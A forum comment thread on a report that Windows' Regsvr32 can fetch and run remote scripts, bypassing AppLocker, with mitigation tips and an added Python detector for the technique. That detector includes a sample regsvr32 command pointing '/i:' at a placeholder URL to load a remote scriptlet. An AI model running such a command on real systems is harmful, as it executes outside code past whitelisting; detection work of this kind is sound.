Core Windows Utility Can Be Used To Bypass Whitelisting (threatpost.com)
Reader msm1267 writes: A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft's AppLocker. A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft. It's unknown whether Microsoft will patch this issue with a security bulletin, or in a future release. Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher's proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. "There's really no patch for this; it's not an exploit. It's just using the tool in an unorthodox manner. It's a bypass, an evasion tactic," the researcher said.

The Register reports: "It's built-in remote code execution without admin rights and which bypasses Windows whitelisting. I'd say it's pretty bad," said Alex Ionescu, a Windows and ARM kernel guru. The trick -- Smith didn't want to call it an exploit -- is neat because it does not touch the Registry, does not need administrator rights, can be wrapped up in an encrypted HTTP session, and should leave no trace on disk as it's a pure to-memory download. No patch exists for this, although regsvr32 can be firewalled off from the internet. Microsoft was not available for immediate comment.
A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft.
If you want news from today, you have to come back tomorrow.
Meh, it still wouldn't get past my firewall.
easy.
Windows System File checker will put that back.
If your firewall is on your router I will agree with you, but if you are talking about the firewall on Windows, then you are seriously mistaken.
Neither Linus Torvalds nor Red Hat have used illicit monopolist tactics to dominate the market. Hence why we don't say "Linu$", but we do say "M$".
Don't all browsers have url javascript shut off by default?
_ _ _ Go for the eyes Boo! GO FOR THE EYES!
You need to run regsvr32 with admin rights anyway. If you're dumb enough to register an unsafe/unknown component you deserve to get hacked.
Harrison's Postulate - "For every action there is an equal and opposite criticism"
Hilariously wrong. regsvr has been in every release of Windows since at least Windows 95 and it might have even been in 3.1. Back when "back doors" were just a twinkle in Ronald Reagan's eye.
It was basically Microsoft's first hit off the crack pipe otherwise known as COM.
That means nothing at all. Why would you think Micro$oft wasn't thinking about taking control over the OS in 95?
The Disable Advertising checkbox does not work.
I would think this can bypass Bit9 as well, since regsvr32 is a common Windows component and allowed. Anyone got a different opinion?
It's a PowerShell command: New-NetFirewallRule -DisplayName "Block Regsrvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block
ASCII tastes bad dude.
Binary it is then.
I'd laugh, except the regular "exploit du jour" thing just isn't funny any more.
Honestly, Windows has more holes than a Chinese whorehouse. Is it ever going to be a secure operating system?
Just cruising through this digital world at 33 1/3 rpm...
So basically the guy that wrote the article had not read the TechNet article that Microsoft wrote about AppLocker's restrictions.
https://technet.microsoft.com/...
AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocker could use these flags to bypass AppLocker rules and launch child processes. You must thoroughly examine each application before allowing them to run by using AppLocker rules.
Good to hear. I need to get mine setup here soon before I get too many more "security patches" that fuck up my Win7 install. In fact I just need to set it to a very small whitelist for windows machines while leaving it open for Linux. I'm not sure how I'm going to do that yet though. Maybe set blocking by IP address and have static IP's?
I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.
Neither Linus Torvalds nor Red Hat have used illicit monopolist tactics to dominate the market. Hence why we don't say "Linu$", but we do say "M$".
Redhat used illicit monopolist tactics to force systemd on the rest of the Linux community
*ducks*
In the free world the media isn't government run; the government is media run.
regsvr32 does not understand DLLs. scrobj.dll does... the contents of the /i switch are passed in to the DLL. Looks like the DLL is the one with the problem. Documentation
I expect most admins can simply block or remove the DLL with little impact on their system unless they are running some obscure program that requires it. Or, as another user suggested, firewall regsvr32 so it can't download files.
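Added example (not from the thread or any of the commenters): the detection side of the two comments above. It scans constructed process-creation records, flags regsvr32 runs whose /i argument is a remote URL or that load scrobj.dll, and leaves an ordinary local DLL registration alone. The record shape and all sample command lines are constructed for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation records (image path + command line),
# roughly the shape a Sysmon or 4688 feed is normalised into. Not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /i:https://files.example.invalid/scriptlet.xml scrobj.dll"},
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"regsvr32.exe /u scrobj.dll"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe /i:http://example.invalid/readme.txt"},
]

# /i: followed by an http(s) URL: the argument regsvr32 hands to the DLL points off-box.
REMOTE_I_ARG = re.compile(r'/i:\s*"?https?://', re.IGNORECASE)
# scrobj.dll is the scriptlet host the thread identifies as the component that runs script.
SCROBJ_DLL = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)


@dataclass
class Finding:
    cmdline: str
    reasons: tuple


def inspect_event(event):
    """Return the reasons this record looks like regsvr32 fetching a remote
    scriptlet; an empty list means the record is not of interest."""
    if not event["image"].lower().endswith("\\regsvr32.exe"):
        return []  # only regsvr32 itself is in scope for this rule
    reasons = []
    if REMOTE_I_ARG.search(event["cmdline"]):
        reasons.append("remote URL passed via /i")
    if SCROBJ_DLL.search(event["cmdline"]):
        reasons.append("scrobj.dll (scriptlet host) loaded by regsvr32")
    return reasons


def scan(events):
    """Run inspect_event over a batch and keep only the records with findings."""
    findings = []
    for event in events:
        reasons = inspect_event(event)
        if reasons:
            findings.append(Finding(event["cmdline"], tuple(reasons)))
    return findings
```

The third sample (a local scrobj.dll unregistration) is flagged on the DLL alone; whether that is noise in a given estate decides if the two conditions should be ANDed instead of ORed.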
MAC won't work, I'm dual booting on all my machines. I'm leaning towards IP.
Soooo...remove execute permission for the binary from everyone but administrators? Problem solved?
My network-fu may be a little rusty, but why would that matter? MACs are burned into the network controller's ROM. Are you spoofing your MACs under Linux or something? I'm assuming your firewall is a router or other separate hardware appliance.
MACs are burned into the network controller's ROM.
LOL. Never played with VMware, have you? What would you like your MAC to be? I'll type it in for you if it's not autoassigned.
There are two types of people in the world: Those who crave closure
What? I was saying that blocking only Windows would not work by blocking by MAC address because I am dual booting on all my machines. I intend to block at the router level (DD-WRT) by IP address and setting separate static IP addresses for Windows and Linux on all the machines.
The final goal is to only allow access to sites required for gaming when in Win7 with the possibility of a few others to support gaming like nexusmods.com
How do you know that this is the only function? Do you have the source code? Can you compile it yourself and compare it to the stock binary?
I didn't think so.
Well he said dual booting, not running VMs. I don't tend to consider running a VM as "dual booting", but I suppose that's just semantics. As for MAC: DEFACEDBABE1 was always fun (I remembered that from some website I no longer recall).
Can't you just rename the damn file to something else?
New Windows is part of a clever master plan. When people reject this disgusting new flavor, MS starts selling Windows Classic. In glass bottles. Made with real sugar.
"Prediction: within 10 years, Windows will be a Linux distribution." Me, 7-6-2016
My network-fu may be a little rusty, but why would that matter? MACs are burned into the network controller's ROM.
MACs have been editable on consumer shit for ages. My old ass nForce 2 chipset from 2002 had an option to define the MAC via the BIOS and via the driver, for example.
Any NIC supporting virtual interfaces (such as for VLANs) will do the same thing.
Then you've got VMs.
Then you've got the fact that my physical interfaces are many (2 wireless, 2 wired on my main box), so even if I want to stick with the default MAC I've got 4 to handle.
...This is a guy that participated in the development of ReactOS. It seems he's pretty smart. A pity he abandoned the project. It really needs people like him.
Okay, so by posting that we know that you are immature, at least intellectually, and that you don't know the definition of malware - in fact, you are so far from the definition that you most likely have no clue about computers or programming.
The start of this sub-thread is ludicrous; no, it isn't a back door for Microsoft to use. Know why? Those of us who actually know what a computer is can check such things. Maybe you'll learn about it when you grow up.
Are you serious? If they wanted to take control of the OS they could have done it without crappy hacks - AS THEY FUCKING WROTE THE FUCKING SYSTEM!
But can you run the above as root without having sudo privileges? The exploit is that anyone, even a browser can execute the code.
Custom electronics and digital signage for your business: www.evcircuits.com
The Register article has a bit more information. This isn't really a vulnerability. It's definitely not "remote code execution". It works like this:
- Microsoft provides a tool called AppLocker that can be used to limit the programs that can be run on a system.
- The AppLocker tool is not intended as a tight "security boundary". Instead, it is a way to implement company policies like "no playing games at work", or to help with software licensing, i.e. "the company system image has a copy of Photoshop, but you aren't in the Design department, so you aren't licensed to run it", and perhaps to reduce attack surface area.
- The Microsoft-provided sample AppLocker configuration (intended to show the syntax for AppLocker rules) happens to have a sample rule that whitelists all programs under C:\windows. This is not a "recommended" rule -- it's a "sample" rule.
- If you leave this rule in, there are a large number of ways to escape the sandbox.
- A researcher found another one. Yay, I guess?
The new one is interesting because I wouldn't have considered regsvr32 to be a command that allows for running of arbitrary other commands. On the other hand, it shouldn't belong in a production whitelist in the first place, so being able to use it to escape the sandbox isn't particularly interesting.
Time flies like an arrow. Fruit flies like a banana.
The stable ABI is what created most of the mess in Windows. Listing this as a shortcoming of Linux shows you have no idea what you're talking about. A huge mass of badly maintained binary only drivers is not a good thing, it's an incredible liability.
Drivers need to be maintained. The only way to ensure that is to have their maintenance be part of the kernel maintenance. A stable ABI would directly counteract this.
And Microsoft keeps doing transgressions. They haven't washed out their stripes. They've just been slapped on the wrist enough to not be blatant about it.
What do you mean with "crappy hacks"? Unless you are referring to the OS as a whole I do not know what you are talking about. I am talking about a backdoor built into the OS.